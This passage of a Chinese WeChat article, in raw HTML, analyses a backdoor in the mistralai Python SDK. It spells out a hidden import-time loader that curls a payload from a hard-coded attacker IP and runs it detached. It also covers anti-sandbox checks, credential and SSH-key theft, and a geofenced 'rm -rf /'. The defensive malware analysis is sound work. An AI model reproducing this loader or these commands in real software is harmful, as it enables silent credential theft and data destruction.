入口并照常发布。用户安装后只要导入模块就会触发。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">下载远控</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> → 恶意代码在后台静默下载一个伪装成机器学习工具的程序(transformers.pyz)。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">搜集数据</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> → 这个远控程序运行后，系统性地扫描并搜集受害电脑上的云凭据、SSH 密钥、CI/CD Token、密码管理器数据等上百类敏感信息，加密后传回攻击者服务器。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">区域破坏</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> → 如果受害电脑位于以色列或伊朗，远控程序会以 1/6 的概率执行 rm -rf / 摧毁系统；否则部署持久化服务，长期潜伏。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">下面分章节详细拆解每个环节的技术细节。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">第一步：恶意入口 —— 导入即触发</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者修改的唯一关键文件是 src/mistralai/client/__init__.py。这个文件是整个 SDK 的主入口——官方 README 里所有示例代码的第一行都是 from mistralai.client import Mistral，因此任何按文档正常使用的开发者都会第一时间触发恶意逻辑。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者在文件末尾塞进了一个名为 _run_background_task() 的函数，并在模块加载时直接调用。完整代码如下：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.6431014823261118" data-type="png" data-w="877" height="486" style="margin-left: 0px;margin-top: 0px;" width="755" data-imgfileid="100021300" src="https://wechat2rss.xlab.app/img-proxy/?k=91a5a46e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLiahJdybfia8ew8uWtS60yLG3H5YUTcBfaeMJoCXeDHI29lt7AOb9Ev5x3q48h3CaT1ZmFa8t1b1C3EMnuPAoJQvjTmGjJ8Oo2o%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这段不到 30 行的代码虽然短，但每一行都有明确目的，逐行拆解如下：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第 6 行 —— 限定 Linux 且不重复触发</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">函数首先检查两个条件：当前系统是不是 Linux (sys.platform.startswith(&#34;linux&#34;))，以及环境变量里有没有 MISTRAL_INIT。只有 Linux 系统且没有这个标记的进程才会继续执行。这意味着，Windows 和 macOS 用户完全不会受影响——攻击者特意瞄准了最有价值的 Linux 服务器和 CI/CD 环境。通过后立即在第 9 行写入 MISTRAL_INIT=1，并且这个标记会在第 23 行传给子进程，防止重复下载。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第 10-11 行 —— 硬编码攻击者服务器地址</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">两个关键信息被直接写在代码里：下载地址 <a href="https://83.142.209.194/transformers.pyz，落地路径" target="_blank">https://83.142.209.194/transformers.pyz，落地路径</a> /tmp/transformers.pyz。攻击者用 IP 地址而不是域名，是为了绕开基于域名的信誉检查和安全扫描。文件名 transformers.pyz 也经过了精心挑选——HuggingFace 的 transformers 是机器学习领域最常用的库之一，在 AI 开发环境里出现这个名字的文件完全不会引起怀疑。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第 15 行 —— 静默下载</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">下载命令是 curl -k -L -s，其中三个参数各有目的：-k 跳过 SSL 证书校验，让自签名或过期证书也能用；-L 跟随 HTTP 重定向；-s 是静默模式，不打印任何进度信息。末尾的 timeout=15 设置了 15 秒超时，万一网络有问题也不会让用户的 import 语句卡住太久，避免引起怀疑。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第 18-24 行 —— 后台启动远控程序</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">下载完成后，用 subprocess.Popen 启动这个远控程序。两个关键隐蔽措施：第 20-21 行把标准输出和标准错误全部扔进 DEVNULL（黑洞），远控程序运行时屏幕上什么都看不到；第 22 行 start_new_session=True 让远控程序脱离当前进程组独立运行——就算用户关掉终端、断开 SSH，远控程序也照样在后台跑。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第 25-26 行 —— 吞掉所有异常</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">try/except: pass 是最狠的一手——不管发生什么错误（curl 没装、网络不通、下载失败、Python 版本不对），用户都不会看到任何报错信息。你的 SDK 一切正常，而恶意代码要么已经成功跑了，要么悄无声息地失败了——你永远不知道。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">第二步：双面远控程序 —— 明修栈道，暗藏杀机</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">一</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">阶段代码</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">下载的 transformers.pyz 是一个独立的 Python 程序包，解压后包含 14 个源文件，结构如下：</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.4009259259259259" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100021314" src="https://wechat2rss.xlab.app/img-proxy/?k=b85e599b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIZs1kn9fibvo7X18UJW360ia9gngJYbgYYn2rv3deUmquCkYb62dfkbl9S1g64p9nlVoNJoJja38bvDPV6sz9XVL2M8Um7CfCoY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这个程序启动后会先做一组&#34;体检&#34;，然后分两条路走：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">绝大多数情况</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：按正常流程，搜集数据 → 加密打包 → 传回攻击者服务器 → 部署持久化服务留在系统里长期潜伏。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">极少数情况</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：如果发现受害电脑位于以色列或伊朗，则以 1/6 概率触发 rm -rf / 摧毁系统，同时用最大音量播放一段音频。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">下面分三个章节详细展开：启动时的自保护机制、数据搜集与加密外传流程、以及最后的地理围栏破坏逻辑。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">第三步：启动前的自保护 —— 环境检查、反沙箱、自装依赖</span></span></h1></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">远控程序启动后（__main__.py），会先做如下检查，任何一条不满足就直接退出：</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不是 Linux？退出。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">系统语言是俄语（LANG 环境变量以 ru 开头）？退出。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">CPU 核心数 ≤ 2？退出。这是典型的反沙箱手段——大多数自动分析沙箱只分配 1-2 个核心。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4.</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">缺少 cryptography 加密库？自动执行 pip install cryptography --break-system-packages，静默装好。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">其中第 2 条的俄语规避和第 3 条的 CPU 检测都指向攻击者有意识地在躲避特定区域的安全团队和自动化分析系统。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完整代码如下：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.7126567844925884" data-type="png" data-w="877" height="604" style="margin-left: 0px;margin-top: 0px;" width="848" data-imgfileid="100021302" src="https://wechat2rss.xlab.app/img-proxy/?k=994ccc96&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKAUNvqJ2WS45FC1MVibm33h2Wib7QTVUG1zWGDIsCueNFPLNQZr448I6caxYxlwV6gxaznf2Q8vABxEdP0g5rU8eZqaN6ib2EjH0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">第四步：数据窃取 —— 七个采集器覆盖上百类敏感信息</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang 